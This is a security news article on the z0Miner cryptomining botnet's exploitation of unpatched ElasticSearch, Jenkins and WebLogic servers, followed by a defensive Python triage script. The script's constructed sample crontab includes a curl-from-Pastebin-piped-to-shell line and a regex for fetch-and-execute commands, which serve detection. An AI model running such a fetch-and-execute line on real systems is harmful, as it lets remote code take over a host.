Cryptomining botnet targets unpatched vulnerabilities in cloud servers
Attackers keep upgrading their tooling to scan for and infect new devices by exploiting unpatched vulnerabilities. Recently, the z0Miner cryptomining malware was observed probing cloud servers by exploiting a new set of unpatched, long-known vulnerabilities.
z0Miner active campaign
Qihoo 360 Netlab researchers have observed z0Miner actively scanning for vulnerabilities in ElasticSearch and Jenkins servers that were fixed in 2015 or earlier.
The botnet was using exploits targeting an ElasticSearch RCE vulnerability (CVE-2015-1427, a Groovy scripting sandbox bypass) and an older RCE vulnerability affecting Jenkins servers.
After compromising a server, the malware first downloads a malicious shell script and sets up a new cron entry to periodically fetch and execute further scripts from Pastebin.
It then downloads a mining kit containing an XMRig miner binary disguised as java.exe, a config file (config.json) and a starter script (solr.sh), and begins mining Monero (XMR) in the background.
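The persistence and mining-kit artefacts described above translate directly into host triage checks. The script below is an added example written for this page; it is not z0Miner's code and not Netlab's tooling. It inspects a Linux host's crontab for an entry that fetches a script from Pastebin and pipes it into a shell, a process listing for an XMRig binary masquerading as java.exe (or a temp-directory binary started with XMRig's -c/--config option), and a config.json for XMRig's pool layout with the Monero RandomX algorithm (rx/0) or a Monero wallet address. The sample crontab, ps output, paste URL and wallet string are constructed for the example, not captured data; the list of paste hosts is an assumption (the article names only Pastebin).

```python
"""Host triage for the z0Miner persistence pattern described above.

Added example, not z0Miner's code and not Netlab's tooling. It checks the
three artefacts the article names on a Linux host: a cron entry that
periodically fetches and executes a script from Pastebin, an XMRig binary
disguised as java.exe, and an XMRig-style config.json mining Monero.
All sample inputs below are constructed for the example, not captured data.
"""
import json
import re

# The article names only Pastebin; extending this tuple is an assumption.
PASTE_HOSTS = ("pastebin.com",)

# "download | interpreter" shape: curl or wget output piped straight into a shell.
FETCH_PIPE_SHELL = re.compile(
    r"\b(curl|wget)\b[^|;]*\|\s*(?:sudo\s+)?(?:sh|bash|dash|zsh)\b"
)

# Monero standard (4...) or sub-address (8...): 95 base58 characters in total.
MONERO_ADDR = re.compile(r"\b[48][1-9A-HJ-NP-Za-km-z]{94}\b")


def suspicious_cron_lines(crontab: str) -> list:
    """Return crontab entries that fetch from a paste site and pipe into a shell."""
    hits = []
    for line in crontab.splitlines():
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        if any(host in entry for host in PASTE_HOSTS) and FETCH_PIPE_SHELL.search(entry):
            hits.append(entry)
    return hits


def miner_process_lines(ps_output: str) -> list:
    """Return command lines from `ps -eo pid,user,args` output that look like the
    disguised miner: a Windows-style java.exe on Linux, or a binary started from a
    temp directory with an XMRig-style -c/--config argument."""
    hits = []
    for line in ps_output.splitlines()[1:]:          # skip the ps header line
        fields = line.split(None, 2)
        if len(fields) < 3:
            continue
        cmd = fields[2]
        argv = cmd.split()
        if not argv:
            continue
        exe_path, exe_name = argv[0], argv[0].rsplit("/", 1)[-1]
        from_tmp = exe_path.startswith(("/tmp/", "/var/tmp/", "/dev/shm/"))
        has_config = any(a in ("-c", "--config") or a.startswith("--config=")
                         for a in argv[1:])
        if exe_name == "java.exe" or (from_tmp and has_config):
            hits.append(cmd)
    return hits


def looks_like_xmrig_config(text: str) -> bool:
    """XMRig's config.json carries a 'pools' list; Monero shows up as the rx/0
    (RandomX) algorithm or a Monero wallet address in the pool 'user' field."""
    try:
        cfg = json.loads(text)
    except ValueError:
        return False
    pools = cfg.get("pools") if isinstance(cfg, dict) else None
    if not isinstance(pools, list):
        return False
    for pool in pools:
        if not isinstance(pool, dict):
            continue
        if pool.get("algo") == "rx/0" or MONERO_ADDR.search(str(pool.get("user", ""))):
            return True
    return False


# --- constructed sample inputs (not real captures) ---------------------------
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/apt-get update -y
*/10 * * * * curl -fsSL https://pastebin.com/raw/abcd1234 | sh
@reboot /opt/solr/bin/solr start
"""

SAMPLE_PS = """\
PID USER COMMAND
1 root /sbin/init
2345 elasticsearch /usr/share/elasticsearch/jdk/bin/java -Xms1g -Xmx1g
3456 jenkins /tmp/.x/java.exe -c /tmp/.x/config.json
"""

# Placeholder wallet: a '4' followed by 94 base58 characters, deliberately fake.
SAMPLE_XMRIG_CONFIG = json.dumps({
    "pools": [{"url": "pool.invalid:3333", "user": "4" + "A" * 94, "algo": "rx/0"}]
})
SAMPLE_BENIGN_CONFIG = json.dumps({"name": "solr", "port": 8983})


def triage() -> dict:
    """Run all three checks over the constructed samples and return the findings."""
    return {
        "cron": suspicious_cron_lines(SAMPLE_CRONTAB),
        "processes": miner_process_lines(SAMPLE_PS),
        "xmrig_config": looks_like_xmrig_config(SAMPLE_XMRIG_CONFIG),
        "benign_config": looks_like_xmrig_config(SAMPLE_BENIGN_CONFIG),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value}")
```

On a live host, feed `crontab -l` for each user plus the files under /etc/cron.d, `ps -eo pid,user,args` and any config.json found next to a suspicious binary into the three functions. The legitimate ElasticSearch JVM and the Solr start entry in the samples are there to show that the checks key on the disguise (a Windows binary name, a temp-directory binary taking a miner config) rather than on Java or Solr as such.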
Since its emergence last year, z0Miner has been observed gaining persistence via crontab and mining Monero.
According to the Tencent Security Team, z0Miner was actively exploiting two WebLogic pre-auth RCE bugs, tracked as CVE-2020-14882 and CVE-2020-14883, to spread to other devices.
In addition, the botnet was spreading laterally via SSH across the networks of already compromised devices.
It had already compromised thousands of devices using the same attack logic seen in the recent campaign.
z0Miner's recent campaign demonstrates how vulnerabilities disclosed years ago, if left unpatched, can still be turned into profit by cybercriminals. Organizations should therefore keep all their systems and applications current with the latest patches. Where patching an exposed ElasticSearch, Jenkins or WebLogic instance lags behind, limiting its network exposure and checking crontabs for unexpected fetch-and-execute entries are useful stopgaps against this kind of threat.